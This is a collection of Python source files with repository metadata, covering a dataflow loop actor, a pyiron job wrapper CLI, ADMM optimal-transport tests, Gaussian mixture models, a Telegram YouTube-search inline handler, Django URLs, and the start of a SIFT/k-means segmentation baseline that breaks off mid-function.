waikato-datamining/shallow-flow
|
3f1d99921e5138598eb164edeb1d23e6f199501c
|
[
"MIT"
] | 2
|
2021-08-18T22:00:08.000Z
|
2021-08-18T22:00:47.000Z
|
base/src/shallowflow/base/sources/_ForLoop.py
|
waikato-datamining/shallowflow
|
3f1d99921e5138598eb164edeb1d23e6f199501c
|
[
"MIT"
] | null | null | null |
from shallowflow.api.source import AbstractListOutputSource
from shallowflow.api.config import Option
class ForLoop(AbstractListOutputSource):
"""
Outputs an integer from the specified range.
"""
def description(self):
"""
Returns a description for the actor.
:return: the actor description
:rtype: str
"""
return "Outputs an integer from the specified range."
def _define_options(self):
"""
For configuring the options.
"""
super()._define_options()
self._option_manager.add(Option(name="start", value_type=int, def_value=1,
help="The starting value"))
self._option_manager.add(Option(name="end", value_type=int, def_value=10,
help="The last value (incl)"))
self._option_manager.add(Option(name="step", value_type=int, def_value=1,
help="The increment between values"))
def _get_item_type(self):
"""
Returns the type of the individual items that get generated, when not outputting a list.
:return: the type that gets generated
"""
return int
def setup(self):
"""
Prepares the actor for use.
:return: None if successful, otherwise error message
:rtype: str
"""
result = super().setup()
if result is None:
if self.get("end") < self.get("start"):
result = "End value (%s) must be smaller than start (%d)!" % (self.get("end"), self.get("start"))
return result
def _do_execute(self):
"""
Performs the actual execution.
:return: None if successful, otherwise error message
:rtype: str
"""
i = self.get("start")
step = self.get("step")
end = self.get("end")
while i <= end:
self._output.append(i)
i += step
return None
| 30.545455
| 113
| 0.556052
|
from shallowflow.api.source import AbstractListOutputSource
from shallowflow.api.config import Option
class ForLoop(AbstractListOutputSource):
def description(self):
return "Outputs an integer from the specified range."
def _define_options(self):
super()._define_options()
self._option_manager.add(Option(name="start", value_type=int, def_value=1,
help="The starting value"))
self._option_manager.add(Option(name="end", value_type=int, def_value=10,
help="The last value (incl)"))
self._option_manager.add(Option(name="step", value_type=int, def_value=1,
help="The increment between values"))
def _get_item_type(self):
return int
def setup(self):
result = super().setup()
if result is None:
if self.get("end") < self.get("start"):
result = "End value (%s) must be smaller than start (%d)!" % (self.get("end"), self.get("start"))
return result
def _do_execute(self):
i = self.get("start")
step = self.get("step")
end = self.get("end")
while i <= end:
self._output.append(i)
i += step
return None
| true
| true
|
790b2907d60dd24209ea9e5a733a1b821116b164
| 1,138
|
py
|
Python
|
pyiron/cli/wrapper.py
|
srmnitc/pyiron
|
ea290206292d60f5ad0a67b171a9f2f71f043264
|
[
"BSD-3-Clause"
] | null | null | null |
pyiron/cli/wrapper.py
|
srmnitc/pyiron
|
ea290206292d60f5ad0a67b171a9f2f71f043264
|
[
"BSD-3-Clause"
] | null | null | null |
pyiron/cli/wrapper.py
|
srmnitc/pyiron
|
ea290206292d60f5ad0a67b171a9f2f71f043264
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
"""
Run a job from hdf5.
"""
from pyiron.base.job.wrapper import job_wrapper_function
def register(parser):
parser.add_argument(
"-d", "--debug", action = "store_true",
help = "enable debug mode" # TODO: what's that mean?
)
parser.add_argument(
"-j", "--job-id",
help = "job id to run"
)
parser.add_argument(
"-p", "--project",
help = "directory where the HDF5 file of the job is located"
)
parser.add_argument(
"-f", "--file-path",
help = "path to the HDF5 file"
)
parser.add_argument(
"-s", "--submit", action = "store_true",
help = "submit to queuing system on remote host"
)
def main(args):
job_wrapper_function(
working_directory=args.project,
job_id=args.job_id,
file_path=args.file_path,
debug=args.debug,
submit_on_remote=args.submit
)
| 29.179487
| 108
| 0.593146
|
from pyiron.base.job.wrapper import job_wrapper_function
def register(parser):
parser.add_argument(
"-d", "--debug", action = "store_true",
help = "enable debug mode"
)
parser.add_argument(
"-j", "--job-id",
help = "job id to run"
)
parser.add_argument(
"-p", "--project",
help = "directory where the HDF5 file of the job is located"
)
parser.add_argument(
"-f", "--file-path",
help = "path to the HDF5 file"
)
parser.add_argument(
"-s", "--submit", action = "store_true",
help = "submit to queuing system on remote host"
)
def main(args):
job_wrapper_function(
working_directory=args.project,
job_id=args.job_id,
file_path=args.file_path,
debug=args.debug,
submit_on_remote=args.submit
)
| true
| true
|
790b295c1eca2286359672cb11eb653de59239b7
| 1,765
|
py
|
Python
|
test_ADMM.py
|
CrazyIvanPro/Optimal_Transport
|
aa782820a5ca5a01909ed3c32acbada43f6cfa0f
|
[
"MIT"
] | 2
|
2020-11-09T10:37:19.000Z
|
2021-07-06T09:24:30.000Z
|
test_ADMM.py
|
CrazyIvanPro/Optimal_Transport
|
aa782820a5ca5a01909ed3c32acbada43f6cfa0f
|
[
"MIT"
] | null | null | null |
test_ADMM.py
|
CrazyIvanPro/Optimal_Transport
|
aa782820a5ca5a01909ed3c32acbada43f6cfa0f
|
[
"MIT"
] | 1
|
2021-06-03T17:07:01.000Z
|
2021-06-03T17:07:01.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =======================================
# File Name: test_ADMM.py
# Purpose : test ADMM solver for primal
# problem and dual problem
# =======================================
from utils import get_params
from ADMM_primal import ADMM_primal
from ADMM_dual import ADMM_dual
import numpy as np
import argparse
import time
import sys
"""Parser
"""
parser = argparse.ArgumentParser()
parser.add_argument('--n', type=int, default=64)
parser.add_argument('--dataset', type=str, choices=['random', 'caffarelli', 'ellipse', 'DOTmark'], default='random')
parser.add_argument('--imageclass', type=str, default='WhiteNoise')
parser.add_argument('--method', type=str, choices=['primal', 'dual'], default='primal')
parser.add_argument('--iters', type=int, default=10000)
parser.add_argument('--alpha', type=float, default=1.618)
parser.add_argument('--rho', type=float, default=1024)
args = parser.parse_args()
def main():
"""Main routine
"""
print("\nTesting ADMM")
print("====================")
print("m = n : ", args.n)
print("dataset: ", args.dataset)
if args.dataset == 'DOTmark':
print("class : ", args.imageclass)
print("method : ", args.method)
print("====================")
mu, nu, c = get_params(args.n, args.dataset, args.imageclass)
start = time.time()
if args.method == 'primal':
ADMM_primal(mu, nu, c, args.iters, args.rho, args.alpha)
elif args.method == 'dual':
ADMM_dual(mu, nu, c, args.iters, args.rho, args.alpha)
t = time.time() - start
print('time = %.5e' % t)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print (" Ctrl+C pressed...")
sys.exit(1)
| 29.915254
| 116
| 0.5983
|
from utils import get_params
from ADMM_primal import ADMM_primal
from ADMM_dual import ADMM_dual
import numpy as np
import argparse
import time
import sys
parser = argparse.ArgumentParser()
parser.add_argument('--n', type=int, default=64)
parser.add_argument('--dataset', type=str, choices=['random', 'caffarelli', 'ellipse', 'DOTmark'], default='random')
parser.add_argument('--imageclass', type=str, default='WhiteNoise')
parser.add_argument('--method', type=str, choices=['primal', 'dual'], default='primal')
parser.add_argument('--iters', type=int, default=10000)
parser.add_argument('--alpha', type=float, default=1.618)
parser.add_argument('--rho', type=float, default=1024)
args = parser.parse_args()
def main():
print("\nTesting ADMM")
print("====================")
print("m = n : ", args.n)
print("dataset: ", args.dataset)
if args.dataset == 'DOTmark':
print("class : ", args.imageclass)
print("method : ", args.method)
print("====================")
mu, nu, c = get_params(args.n, args.dataset, args.imageclass)
start = time.time()
if args.method == 'primal':
ADMM_primal(mu, nu, c, args.iters, args.rho, args.alpha)
elif args.method == 'dual':
ADMM_dual(mu, nu, c, args.iters, args.rho, args.alpha)
t = time.time() - start
print('time = %.5e' % t)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print (" Ctrl+C pressed...")
sys.exit(1)
| true
| true
|
790b2982b23a530e0f088aaff3c4702dc9aa626c
| 2,407
|
py
|
Python
|
livius/audio/audioProcessing.py
|
papar22/livius
|
a28929ef27f9737a598bbae36360ebe7b55a3f41
|
[
"Unlicense"
] | 1
|
2018-05-08T20:04:08.000Z
|
2018-05-08T20:04:08.000Z
|
livius/audio/audioProcessing.py
|
raffienficiaud/livius
|
a28929ef27f9737a598bbae36360ebe7b55a3f41
|
[
"Unlicense"
] | null | null | null |
livius/audio/audioProcessing.py
|
raffienficiaud/livius
|
a28929ef27f9737a598bbae36360ebe7b55a3f41
|
[
"Unlicense"
] | null | null | null |
# Import Basic modules
import numpy as np
import os
# Import everything needed to edit video clips
from moviepy.editor import *
from moviepy.Clip import *
from moviepy.video.VideoClip import *
from moviepy.config import get_setting # ffmpeg, ffmpeg.exe, etc...
class AudioProcessing:
# documentation string, which can be accessed via ClassName.__doc__ (slide_detection.__doc__ )
""" This class include all required attributes and methods for slide detection.
It includes different algorithms for slide detection such as harris corner detection,
Histogram thresholding, Hough Transform, sum of differences of all frames and etc.
The input of the functions is the input image/frame/video and the output is the four
coordinates of the position of the detected slide.
Built-In Class Attributes:
Every Python class keeps following built-in attributes and they can be accessed using
dot operator like any other attribute:
__dict__ : Dictionary containing the class's namespace.
__doc__ : Class documentation string or None if undefined.
__name__: Class name.
__module__: Module name in which the class is defined. This attribute is "__main__" in interactive mode.
__bases__ : A possibly empty tuple containing the base classes, in the order of their occurrence
in the base class list."""
def __init__(self, inputFile):
self.inputFile = inputFile
#def template_matching(self):
def equalizer(self):
'''
This function serves for Haris Corner Detector
Inputs:
Outputs:
Example:
'''
def signal_improvement(self):
'''
This function serves for sum of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_coding(self, bitrate, codecformat):
'''
This function serves for max of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_clip(self):
'''
This function serves for max of all frames
Inputs:
Outputs:
Example:
'''
if __name__ == '__main__':
print "done"
| 20.57265
| 108
| 0.617366
|
import numpy as np
import os
from moviepy.editor import *
from moviepy.Clip import *
from moviepy.video.VideoClip import *
from moviepy.config import get_setting
class AudioProcessing:
""" This class include all required attributes and methods for slide detection.
It includes different algorithms for slide detection such as harris corner detection,
Histogram thresholding, Hough Transform, sum of differences of all frames and etc.
The input of the functions is the input image/frame/video and the output is the four
coordinates of the position of the detected slide.
Built-In Class Attributes:
Every Python class keeps following built-in attributes and they can be accessed using
dot operator like any other attribute:
__dict__ : Dictionary containing the class's namespace.
__doc__ : Class documentation string or None if undefined.
__name__: Class name.
__module__: Module name in which the class is defined. This attribute is "__main__" in interactive mode.
__bases__ : A possibly empty tuple containing the base classes, in the order of their occurrence
in the base class list."""
def __init__(self, inputFile):
self.inputFile = inputFile
#def template_matching(self):
def equalizer(self):
'''
This function serves for Haris Corner Detector
Inputs:
Outputs:
Example:
'''
def signal_improvement(self):
'''
This function serves for sum of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_coding(self, bitrate, codecformat):
'''
This function serves for max of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_clip(self):
'''
This function serves for max of all frames
Inputs:
Outputs:
Example:
'''
if __name__ == '__main__':
print "done"
| false
| true
|
790b2c18fd1bc9773b6a57aed8716bfd86135e86
| 1,355
|
py
|
Python
|
code/examples/example_mikhail.py
|
hugopibernat/BayesianABTestAnalysis
|
026960524f5313f4a734f30fd447a5731be802e0
|
[
"Apache-2.0"
] | null | null | null |
code/examples/example_mikhail.py
|
hugopibernat/BayesianABTestAnalysis
|
026960524f5313f4a734f30fd447a5731be802e0
|
[
"Apache-2.0"
] | null | null | null |
code/examples/example_mikhail.py
|
hugopibernat/BayesianABTestAnalysis
|
026960524f5313f4a734f30fd447a5731be802e0
|
[
"Apache-2.0"
] | null | null | null |
from bayesianABTest import sampleSuccessRateForBinomial
from numpy import mean
def bestOfFive(A,B,C,D,E,F):
return mean( (A > B) & (A > C) & (A > D) & (A > E) & (A > F))
############# Example: Binomial Distribution #############
# Actual data for all cases
installs = [986,1013,959,968,1029,1014]
returns = [340,298,274,287,325,291]
A = sampleSuccessRateForBinomial(installs[0],returns[0])
B = sampleSuccessRateForBinomial(installs[1],returns[1])
C = sampleSuccessRateForBinomial(installs[2],returns[2])
D = sampleSuccessRateForBinomial(installs[3],returns[3])
E = sampleSuccessRateForBinomial(installs[4],returns[4])
F = sampleSuccessRateForBinomial(installs[5],returns[5])
A_best = bestOfFive(A,B,C,D,E,F)
B_best = bestOfFive(B,A,C,D,E,F)
C_best = bestOfFive(C,B,A,D,E,F)
D_best = bestOfFive(D,B,C,A,E,F)
E_best = bestOfFive(E,B,C,D,A,F)
F_best = bestOfFive(F,B,C,D,E,A)
# Get samples from the posterior
print "The probability of 20 being the best choice is {}".format(A_best)
print "The probability of 21 being the best choice is {}".format(B_best)
print "The probability of 22 being the best choice is {}".format(C_best)
print "The probability of 23 being the best choice is {}".format(D_best)
print "The probability of 24 being the best choice is {}".format(E_best)
print "The probability of 25 being the best choice is {}".format(F_best)
| 38.714286
| 72
| 0.720295
|
from bayesianABTest import sampleSuccessRateForBinomial
from numpy import mean
def bestOfFive(A,B,C,D,E,F):
return mean( (A > B) & (A > C) & (A > D) & (A > E) & (A > F))
robability of 21 being the best choice is {}".format(B_best)
print "The probability of 22 being the best choice is {}".format(C_best)
print "The probability of 23 being the best choice is {}".format(D_best)
print "The probability of 24 being the best choice is {}".format(E_best)
print "The probability of 25 being the best choice is {}".format(F_best)
| false
| true
|
790b2c72de1235c0ff977b57459bda4356b27913
| 5,790
|
py
|
Python
|
bananas/model.py
|
bccp/bananaplots
|
dbfe107207e07351c7d7125430fde16fb2731cc2
|
[
"Apache-2.0"
] | 1
|
2016-09-13T16:44:42.000Z
|
2016-09-13T16:44:42.000Z
|
bananas/model.py
|
bccp/bananaplots
|
dbfe107207e07351c7d7125430fde16fb2731cc2
|
[
"Apache-2.0"
] | 8
|
2016-08-24T22:56:35.000Z
|
2016-09-29T00:58:52.000Z
|
bananas/model.py
|
bccp/bananaplots
|
dbfe107207e07351c7d7125430fde16fb2731cc2
|
[
"Apache-2.0"
] | 1
|
2021-12-11T22:51:22.000Z
|
2021-12-11T22:51:22.000Z
|
import numpy
# FIXME: copy the functions here
from sklearn.mixture.gmm import log_multivariate_normal_density, logsumexp
def sample_gaussian2(means, cv, size, random_state, mins, maxes):
def once(size1):
g = random_state.multivariate_normal(means, cv, size1).T
g = g.reshape(len(means), -1)
mask = (g >= mins[:, None]).all(axis=0)
mask &= (g <= maxes[:, None]).all(axis=0)
return g[:, mask]
g = once(size)
generated = size
while g.shape[1] < size:
fac = 1.0 * g.shape[1] / size
togen = (size - g.shape[1]) * generated // g.shape[1]
g1 = once(togen)
generated = generated + togen
g = numpy.append(g, g1, axis=1)
return g[:, :size]
class GMM(object):
def __init__(self, weights, means, covs, lims):
self.weights = numpy.array(weights)
self.means = numpy.array(means)
self.covs = numpy.array(covs)
self.lims = numpy.array(lims)
[nc] = self.weights.shape
assert self.means.shape[0] == nc
[nc, nf] = self.means.shape
assert self.covs.shape[0] == nc
assert self.covs.shape[1] == nf
assert self.covs.shape[2] == nf
[nc, nf, nf] = self.covs.shape
assert self.lims.shape[0] == nf
assert self.lims.shape[1] == 2
def score(self, X, return_responsibilities=False):
nc = len(self.weights)
X = numpy.array(X)
if X.ndim == 1:
X = X[:, None]
if X.shape[1] != self.means.shape[1]:
raise ValueError('The shape of X is not compatible with self')
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
lpr = numpy.log(self.weights) + \
log_multivariate_normal_density(X,
self.means,
self.covs, 'full')
mask = (X >= mins[None, :]).all(axis=-1)
mask &= (X <= maxes[None, :]).all(axis=-1)
logprob = logsumexp(lpr, axis=1)
logprob[~mask] = -numpy.inf
if return_responsibilities:
responsibilities = numpy.exp(lpr - logprob[:, None])
responsibilities[~mask] = 0
return logprob, responsibilities
return logprob
def marginalize(self, axes):
return GMM(self.weights, self.means[..., axes], self.covs[..., axes][..., axes, :], self.lims[axes])
def sample(self, size, random_state=None):
"""Generate random samples from the model.
Returns
-------
X : array_like, shape (n_samples, n_features)
List of samples
"""
if random_state is None:
random_state = numpy.random
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
X = numpy.empty(size, ('f8', (self.means.shape[1],)))
# decide which component to use for each sample
comps = random_state.choice(len(self.weights), p=self.weights, size=size)
# for each component, generate all needed samples
for comp in range(len(self.weights)):
# occurrences of current component in X
comp_in_X = (comp == comps)
# number of those occurrences
num_comp_in_X = comp_in_X.sum()
if num_comp_in_X > 0:
cv = self.covs[comp]
g = sample_gaussian2(
self.means[comp], cv,
num_comp_in_X, random_state, mins, maxes).T
X[comp_in_X] = g
return X
@classmethod
def fit(kls, nc, X, lims):
# FIXME: get rid of this and add weights support
from sklearn import mixture
# XXX: Do not use DPGMM because the normalization is buggy
# https://github.com/scikit-learn/scikit-learn/issues/7371
model = mixture.GMM(nc, covariance_type='full', n_iter=1000)
model.fit(X)
if not model.converged_:
raise ValueError("Your data is strange. Gaussian mixture failed to converge")
return kls(model.weights_, model.means_, model.covars_, lims)
class Confidence(object):
def __init__(self, model, confidence_table):
self.model = model
self.confidence_table = confidence_table
def score(self, sc):
x, y = self.confidence_table
return numpy.interp(sc, x, y, left=1., right=0.)
@classmethod
def fit(kls, model, nsample=4*1024, vmin=-5, vmax=0, nb=100):
X = model.sample(nsample)
sc = model.score(X)
confidence_levels = 1 - numpy.logspace(vmin, vmax, num=nb)
# FIXME: add weight support here
sc_cl = numpy.percentile(sc, 100. - confidence_levels * 100.)
confidence_table = numpy.array([sc_cl, confidence_levels])
return kls(model, confidence_table)
class CombinedModel(object):
def __init__(self, models):
self.models = models
def score(self, X):
return sum([model.score(X) for model in self.models])
def marginalize(self, axes):
return CombinedModel([
model.marginalize(axes) for model in self.models])
def sample(self, nsample, random_state=None):
if random_state is None:
random_state = numpy.random
def once(size):
X = self.models[0].sample(size, random_state)
nf = X.shape[-1]
lnprob = sum([model.score(X) for model in self.models[1:]])
prob = numpy.exp(lnprob)
prob /= prob.max()
keep = random_state.rand(len(X)) < prob
return X[keep].reshape(-1, nf)
g = once(nsample)
ng = nsample
while len(g) < nsample:
togen = (nsample - len(g)) * ng // len(g)
g1 = once(togen)
ng = ng + togen
g = numpy.append(g, g1, axis=0)
return g[:nsample]
| 33.859649
| 108
| 0.56943
|
import numpy
from sklearn.mixture.gmm import log_multivariate_normal_density, logsumexp
def sample_gaussian2(means, cv, size, random_state, mins, maxes):
def once(size1):
g = random_state.multivariate_normal(means, cv, size1).T
g = g.reshape(len(means), -1)
mask = (g >= mins[:, None]).all(axis=0)
mask &= (g <= maxes[:, None]).all(axis=0)
return g[:, mask]
g = once(size)
generated = size
while g.shape[1] < size:
fac = 1.0 * g.shape[1] / size
togen = (size - g.shape[1]) * generated // g.shape[1]
g1 = once(togen)
generated = generated + togen
g = numpy.append(g, g1, axis=1)
return g[:, :size]
class GMM(object):
def __init__(self, weights, means, covs, lims):
self.weights = numpy.array(weights)
self.means = numpy.array(means)
self.covs = numpy.array(covs)
self.lims = numpy.array(lims)
[nc] = self.weights.shape
assert self.means.shape[0] == nc
[nc, nf] = self.means.shape
assert self.covs.shape[0] == nc
assert self.covs.shape[1] == nf
assert self.covs.shape[2] == nf
[nc, nf, nf] = self.covs.shape
assert self.lims.shape[0] == nf
assert self.lims.shape[1] == 2
def score(self, X, return_responsibilities=False):
nc = len(self.weights)
X = numpy.array(X)
if X.ndim == 1:
X = X[:, None]
if X.shape[1] != self.means.shape[1]:
raise ValueError('The shape of X is not compatible with self')
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
lpr = numpy.log(self.weights) + \
log_multivariate_normal_density(X,
self.means,
self.covs, 'full')
mask = (X >= mins[None, :]).all(axis=-1)
mask &= (X <= maxes[None, :]).all(axis=-1)
logprob = logsumexp(lpr, axis=1)
logprob[~mask] = -numpy.inf
if return_responsibilities:
responsibilities = numpy.exp(lpr - logprob[:, None])
responsibilities[~mask] = 0
return logprob, responsibilities
return logprob
def marginalize(self, axes):
return GMM(self.weights, self.means[..., axes], self.covs[..., axes][..., axes, :], self.lims[axes])
def sample(self, size, random_state=None):
if random_state is None:
random_state = numpy.random
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
X = numpy.empty(size, ('f8', (self.means.shape[1],)))
comps = random_state.choice(len(self.weights), p=self.weights, size=size)
for comp in range(len(self.weights)):
comp_in_X = (comp == comps)
num_comp_in_X = comp_in_X.sum()
if num_comp_in_X > 0:
cv = self.covs[comp]
g = sample_gaussian2(
self.means[comp], cv,
num_comp_in_X, random_state, mins, maxes).T
X[comp_in_X] = g
return X
@classmethod
def fit(kls, nc, X, lims):
from sklearn import mixture
model = mixture.GMM(nc, covariance_type='full', n_iter=1000)
model.fit(X)
if not model.converged_:
raise ValueError("Your data is strange. Gaussian mixture failed to converge")
return kls(model.weights_, model.means_, model.covars_, lims)
class Confidence(object):
def __init__(self, model, confidence_table):
self.model = model
self.confidence_table = confidence_table
def score(self, sc):
x, y = self.confidence_table
return numpy.interp(sc, x, y, left=1., right=0.)
@classmethod
def fit(kls, model, nsample=4*1024, vmin=-5, vmax=0, nb=100):
X = model.sample(nsample)
sc = model.score(X)
confidence_levels = 1 - numpy.logspace(vmin, vmax, num=nb)
sc_cl = numpy.percentile(sc, 100. - confidence_levels * 100.)
confidence_table = numpy.array([sc_cl, confidence_levels])
return kls(model, confidence_table)
class CombinedModel(object):
def __init__(self, models):
self.models = models
def score(self, X):
return sum([model.score(X) for model in self.models])
def marginalize(self, axes):
return CombinedModel([
model.marginalize(axes) for model in self.models])
def sample(self, nsample, random_state=None):
if random_state is None:
random_state = numpy.random
def once(size):
X = self.models[0].sample(size, random_state)
nf = X.shape[-1]
lnprob = sum([model.score(X) for model in self.models[1:]])
prob = numpy.exp(lnprob)
prob /= prob.max()
keep = random_state.rand(len(X)) < prob
return X[keep].reshape(-1, nf)
g = once(nsample)
ng = nsample
while len(g) < nsample:
togen = (nsample - len(g)) * ng // len(g)
g1 = once(togen)
ng = ng + togen
g = numpy.append(g, g1, axis=0)
return g[:nsample]
| true
| true
|
790b2c91d5044689c187c8c0af450741d2838ee3
| 3,942
|
py
|
Python
|
plugins/inline.py
|
OxyNotOp/OxyPlayer
|
6747e1a20ad2c1ef54d461505a4f61a1e9f00e85
|
[
"MIT"
] | null | null | null |
plugins/inline.py
|
OxyNotOp/OxyPlayer
|
6747e1a20ad2c1ef54d461505a4f61a1e9f00e85
|
[
"MIT"
] | null | null | null |
plugins/inline.py
|
OxyNotOp/OxyPlayer
|
6747e1a20ad2c1ef54d461505a4f61a1e9f00e85
|
[
"MIT"
] | null | null | null |
#MIT License
#Copyright (c) 2021 OXYOP
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from pyrogram.handlers import InlineQueryHandler
from youtubesearchpython import VideosSearch
from utils import USERNAME
from pyrogram.types import InlineQueryResultArticle, InputTextMessageContent, InlineKeyboardButton, InlineKeyboardMarkup
from pyrogram import Client, errors
from config import Config
REPLY_MESSAGE=Config.REPLY_MESSAGE
buttons = [
[
InlineKeyboardButton('⚡️Make Own Bot', url='https://heroku.com/deploy?template=https://github.com/OxyNotOp/OxyPlayer'),
InlineKeyboardButton('🧩 Source Code', url='https://github.com/OxyNotOp/OxyPlayer'),
],
[
InlineKeyboardButton('🎧Play Music', url=f'https://t.me/{USERNAME}'),
InlineKeyboardButton('👨🏼🦯 Help', callback_data='help')
]
]
@Client.on_inline_query()
async def search(client, query):
answers = []
if query.query == "ORU_MANDAN_PM_VANNU":
answers.append(
InlineQueryResultArticle(
title="Deploy",
input_message_content=InputTextMessageContent(f"{REPLY_MESSAGE}\n\n<b>You can't use this bot in your group, for that you have to make your own bot from the [SOURCE CODE](https://github.com/OxyNotOp/OxyPlayer) below.</b>", disable_web_page_preview=True),
reply_markup=InlineKeyboardMarkup(buttons)
)
)
await query.answer(results=answers, cache_time=0)
return
string = query.query.lower().strip().rstrip()
if string == "":
await client.answer_inline_query(
query.id,
results=answers,
switch_pm_text=("Search a youtube video"),
switch_pm_parameter="help",
cache_time=0
)
else:
videosSearch = VideosSearch(string.lower(), limit=50)
for v in videosSearch.result()["result"]:
answers.append(
InlineQueryResultArticle(
title=v["title"],
description=("Duration: {} Views: {}").format(
v["duration"],
v["viewCount"]["short"]
),
input_message_content=InputTextMessageContent(
"/play https://www.youtube.com/watch?v={}".format(
v["id"]
)
),
thumb_url=v["thumbnails"][0]["url"]
)
)
try:
await query.answer(
results=answers,
cache_time=0
)
except errors.QueryIdInvalid:
await query.answer(
results=answers,
cache_time=0,
switch_pm_text=("Nothing found"),
switch_pm_parameter="",
)
__handlers__ = [
[
InlineQueryHandler(
search
)
]
]
| 39.42
| 269
| 0.624556
|
from pyrogram.handlers import InlineQueryHandler
from youtubesearchpython import VideosSearch
from utils import USERNAME
from pyrogram.types import InlineQueryResultArticle, InputTextMessageContent, InlineKeyboardButton, InlineKeyboardMarkup
from pyrogram import Client, errors
from config import Config
REPLY_MESSAGE=Config.REPLY_MESSAGE
buttons = [
[
InlineKeyboardButton('⚡️Make Own Bot', url='https://heroku.com/deploy?template=https://github.com/OxyNotOp/OxyPlayer'),
InlineKeyboardButton('🧩 Source Code', url='https://github.com/OxyNotOp/OxyPlayer'),
],
[
InlineKeyboardButton('🎧Play Music', url=f'https://t.me/{USERNAME}'),
InlineKeyboardButton('👨🏼🦯 Help', callback_data='help')
]
]
@Client.on_inline_query()
async def search(client, query):
answers = []
if query.query == "ORU_MANDAN_PM_VANNU":
answers.append(
InlineQueryResultArticle(
title="Deploy",
input_message_content=InputTextMessageContent(f"{REPLY_MESSAGE}\n\n<b>You can't use this bot in your group, for that you have to make your own bot from the [SOURCE CODE](https://github.com/OxyNotOp/OxyPlayer) below.</b>", disable_web_page_preview=True),
reply_markup=InlineKeyboardMarkup(buttons)
)
)
await query.answer(results=answers, cache_time=0)
return
string = query.query.lower().strip().rstrip()
if string == "":
await client.answer_inline_query(
query.id,
results=answers,
switch_pm_text=("Search a youtube video"),
switch_pm_parameter="help",
cache_time=0
)
else:
videosSearch = VideosSearch(string.lower(), limit=50)
for v in videosSearch.result()["result"]:
answers.append(
InlineQueryResultArticle(
title=v["title"],
description=("Duration: {} Views: {}").format(
v["duration"],
v["viewCount"]["short"]
),
input_message_content=InputTextMessageContent(
"/play https://www.youtube.com/watch?v={}".format(
v["id"]
)
),
thumb_url=v["thumbnails"][0]["url"]
)
)
try:
await query.answer(
results=answers,
cache_time=0
)
except errors.QueryIdInvalid:
await query.answer(
results=answers,
cache_time=0,
switch_pm_text=("Nothing found"),
switch_pm_parameter="",
)
__handlers__ = [
[
InlineQueryHandler(
search
)
]
]
| true
| true
|
790b2cc52380b3a8bf9200492b36ecac98c8f1d1
| 232
|
py
|
Python
|
project/apps/portfolio/urls.py
|
mahdimehrabi/django-portfolio-app
|
987bbfe6dce151f1b32e69ee833b71db636e933f
|
[
"MIT"
] | 4
|
2021-08-11T15:23:32.000Z
|
2021-12-31T02:55:33.000Z
|
project/apps/portfolio/urls.py
|
mahdimehrabi/django-portfolio-app
|
987bbfe6dce151f1b32e69ee833b71db636e933f
|
[
"MIT"
] | null | null | null |
project/apps/portfolio/urls.py
|
mahdimehrabi/django-portfolio-app
|
987bbfe6dce151f1b32e69ee833b71db636e933f
|
[
"MIT"
] | null | null | null |
from django.urls import path
from .views import Index, language_switch
app_name = 'portfolio'
urlpatterns = [
path('', Index.as_view(), name='index'),
path('switch-lang/<str:lang>/', language_switch, name='switch-lang'),
]
| 25.777778
| 73
| 0.698276
|
from django.urls import path
from .views import Index, language_switch
app_name = 'portfolio'
urlpatterns = [
path('', Index.as_view(), name='index'),
path('switch-lang/<str:lang>/', language_switch, name='switch-lang'),
]
| true
| true
|
790b2ce856eb1abe3a674d8d4c7412b9a9543a94
| 11,132
|
py
|
Python
|
src/scripts/segmentation/baselines/kmeans_and_sift.py
|
THinnerichs/MiS-Information-Clustering
|
597c70e1283222e0e841e24f6805b967aaf3c9e0
|
[
"MIT"
] | null | null | null |
src/scripts/segmentation/baselines/kmeans_and_sift.py
|
THinnerichs/MiS-Information-Clustering
|
597c70e1283222e0e841e24f6805b967aaf3c9e0
|
[
"MIT"
] | null | null | null |
src/scripts/segmentation/baselines/kmeans_and_sift.py
|
THinnerichs/MiS-Information-Clustering
|
597c70e1283222e0e841e24f6805b967aaf3c9e0
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import os
import pickle
import sys
import cv2
import numpy as np
import torch
import vlfeat # calls constructor
from sklearn.cluster import MiniBatchKMeans
from src.utils.cluster.eval_metrics import _hungarian_match, _original_match, \
_acc
from src.utils.segmentation.data import make_Coco_dataloaders, \
make_Potsdam_dataloaders
SIFT_DLEN = 128
SIFT_STEP = 10
def _get_vectorised_sift_samples(archetype_config, dataloader):
# returns num unmasked pixels x SIFT_DLEN, in uint8 format
# operates on greyscale 128 bit images
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz # estimate
img_sz = archetype_config.input_sz
# cluster individual (box central) pixels
desc_side = int(img_sz / SIFT_STEP)
print("img sz %d, desc_side %d" % (img_sz, desc_side))
sys.stdout.flush()
